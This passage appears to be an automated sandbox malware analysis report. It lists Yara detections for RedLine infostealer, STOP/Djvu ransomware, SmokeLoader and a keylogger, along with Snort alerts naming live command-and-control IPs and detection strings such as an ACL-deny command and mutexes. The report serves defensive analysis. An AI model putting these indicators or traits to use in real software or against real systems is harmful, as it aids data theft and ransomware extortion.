16.3.226F.exe.d030000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.3.226F.exe.d030000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
16.3.226F.exe.d030000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.3.226F.exe.d030000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
15.2.2560.exe.4a015a0.1.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xdf7ea:$s1: http:// 0xfd898:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xfdf4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101b2b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xffa26:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xdf7ea:$f1: http://
15.2.2560.exe.4a015a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.2560.exe.4a015a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.2560.exe.4a015a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.226F.exe.16f3fc0.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.226F.exe.16f3fc0.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18868:$pat14: , CommandLine: 0x118a1:$v2_1: ListOfProcesses 0x11680:$v4_3: base64str 0x12203:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c13:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
16.2.226F.exe.16f3fc0.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.2.226F.exe.16f3fc0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x7a984:$s5: delete[] 0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
16.3.226F.exe.16f3fc0.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.3.226F.exe.16f3fc0.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x18868:$pat14: , CommandLine: 0x118a1:$v2_1: ListOfProcesses 0x11680:$v4_3: base64str 0x12203:$v4_4: stringKey 0xff63:$v4_5: BytesToStringConverted 0xf176:$v4_6: FromBase64 0x10498:$v4_8: procName 0x10c13:$v5_5: FileScanning 0x1016c:$v5_7: RecordHeaderField 0xfe34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
16.3.226F.exe.16f3fc0.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
16.3.226F.exe.16f3fc0.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x7a984:$s5: delete[] 0x1a468:$pat14: , CommandLine: 0x134a1:$v2_1: ListOfProcesses 0x13280:$v4_3: base64str 0x13e03:$v4_4: stringKey 0x11b63:$v4_5: BytesToStringConverted 0x10d76:$v4_6: FromBase64 0x12098:$v4_8: procName 0x12813:$v5_5: FileScanning 0x11d6c:$v5_7: RecordHeaderField 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
15.2.2560.exe.4a015a0.1.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
15.2.2560.exe.4a015a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.2560.exe.4a015a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.2560.exe.4a015a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.2560.exe.400000.0.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0xe0dea:$s1: http:// 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF 0xe0dea:$f1: http://
17.2.2560.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.2560.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.2560.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
19.3.fontview.exe.55a0000.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
19.3.fontview.exe.55a0000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.rundll32.exe.2275d6f0000.11.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 30 entries

Snort Signatures

ETPRO TROJAN Rhadamanthys Stealer - Payload Response - Source IP: 109.206.243.168 - Destination IP: 192.168.2.3

Timestamp:	109.206.243.168192.168.2.380497352853001 01/25/23-09:43:38.668137
SID:	2853001
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Rhadamanthys Stealer - Data Exfil - Source IP: 192.168.2.3 - Destination IP: 109.206.243.168

Timestamp:	192.168.2.3109.206.243.16849736802853002 01/25/23-09:44:09.970426
SID:	2853002
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Rhadamanthys Stealer - Data Exfil - Source IP: 192.168.2.3 - Destination IP: 109.206.243.168

Timestamp:	192.168.2.3109.206.243.16849760802853002 01/25/23-09:44:49.715501
SID:	2853002
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.3 - Destination IP: 89.208.103.88

Timestamp:	192.168.2.389.208.103.8849733375382043231 01/25/23-09:43:35.518560
SID:	2043231
Source Port:	49733
Destination Port:	37538
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Rhadamanthys Stealer - Payload Download Request - Source IP: 192.168.2.3 - Destination IP: 109.206.243.168

Timestamp:	192.168.2.3109.206.243.16849735802043202 01/25/23-09:43:38.621799
SID:	2043202
Source Port:	49735
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN RedLine Stealer TCP CnC net.tcp Init - Source IP: 192.168.2.3 - Destination IP: 89.208.103.88

Timestamp:	192.168.2.389.208.103.8849733375382043233 01/25/23-09:43:14.099188
SID:	2043233
Source Port:	49733
Destination Port:	37538
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 89.208.103.88 - Destination IP: 192.168.2.3

Timestamp:	89.208.103.88192.168.2.337538497332043234 01/25/23-09:43:16.162357
SID:	2043234
Source Port:	37538
Destination Port:	49733
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dipcj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: potunulit.org

Source: unknown

HTTPS traffic detected: 162.0.217.254:443 -> 192.168.2.3:49730 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 19.3.fontview.exe.55a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.3.fontview.exe.55a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.rundll32.exe.2275d6f0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000003.386704960.00000000053B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.480168588.000002275D6F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.535647654.0000019D88EF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.387503810.00000000055A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.478098878.000002275D46D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Code function: 14_2_00402830 Concurrency::cancel_current_task,Concurrency::cancel_current_task,Concurrency::cancel_current_task,OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,SetClipboardData,CloseClipboard,CloseClipboard,GlobalFree,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard,

Source: C:\Users\user\AppData\Local\Temp\336E.exe

Source: 2560.exe, 0000000F.00000002.362461879.0000000002F6A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: fontview.exe, 00000013.00000003.400623587.000000000564B000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: NtUserGetRawInputData

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.2560.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.402603602.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.361737434.0000000002EA1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.577154071.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000D.00000002.403103692.0000000002C80000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.290595055.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.290961017.0000000002C60000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000E.00000002.577358269.0000000000678000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: Process Memory Space: 2560.exe PID: 2136, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: Process Memory Space: 2560.exe PID: 3152, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5980 -s 648

Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040906E
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_004170F5
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0041449A
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00415940
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040D92B
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00413A12
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_00413F56
Source: C:\Users\user\Desktop\aw9Ynwqd1x.exe	Code function: 0_2_0040C72C
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040906E
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_004170F5
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0041449A
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00415940
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040D92B
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00413A12
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_00413F56
Source: C:\Users\user\AppData\Roaming\dbjigst	Code function: 13_2_0040C72C
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004041D0
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00411470
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004010E0
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00406150
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004021D0
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0042429D
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0042C5FE
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0040D600
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_004266B9
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00402830
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0040C9A0
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00419A6E
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0041CAF0
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0042AB9A
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0040CC40
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00401D90
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_0040CE90
Source: C:\Users\user\AppData\Local\Temp\336E.exe	Code function: 14_2_00421F48

Source: C:\Windows\explorer.exe	Section loaded: webio.dll
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: rtutils.dll

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\226F.exe 768E12A9AF62F5F83F6D6FF64C6C10E37834FC202E0E4D609C80CE7FACC8C534

Source: aw9Ynwqd1x.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.2.2560.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.2560.exe.4a015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 15.2.2560.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
